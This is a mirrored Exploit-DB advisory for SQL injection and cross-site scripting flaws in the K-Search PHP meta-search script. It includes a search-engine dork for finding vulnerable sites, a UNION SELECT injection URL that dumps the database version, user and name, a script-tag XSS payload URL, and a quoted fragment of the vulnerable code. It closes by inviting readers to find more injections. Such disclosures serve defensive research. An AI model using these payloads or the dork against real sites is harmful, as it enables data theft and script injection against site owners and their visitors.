bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/13993.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

44 lines
No EOL
1.5 KiB
Text
Raw Blame History

####################################################
# Category: K-Search (SQL/XSS) Multiple Remote Vulnerabilities
# Download: http://turn-k.net/k-search/demo
# Dork: inurl:K-Search, Powered By K-Search
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group - bug-z0ne.info
####################################################
Info:
K-Search provides you a quick and easy way to start your own meta-search
engine and earn money by displaying relevant sponsored results taken from
Pay Per Click feeds or your own sponsors.
Explain:
when you have Sponsors Area Account, then you can edit your site, delelet
your site...
---------------------------------------------------------------------------------------------
SQL Vulnerabilities:
Exploit:
http://localhost//index.php?req=edit&id=999999 And 1=0 UNION SELECT
1,2,group_concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10/*
---------------------------------------------------------------------------------------------
XSS Vulnerabilities:
$words = $wrds = preg_split('/[\W]+?/',$en['term']);
$misspelled = $return = array();
............
$msp = implode(' ',$words);
$msp = str_replace('</b></i> <i><b>',' ',$msp);
$que = implode(' ',$wrds);
$en['spell_corrected'] = '<a
Exploit:
http://localhost/index.php?term="><script>alert(String.fromCharCode(Your
charcode here))<%2Fscript>&sm=Search&source=1&req=search
---------------------------------------------------------------------------------------------
Many SQL here. Check and enjoy yourself
Reference in a new issue View git blame Copy permalink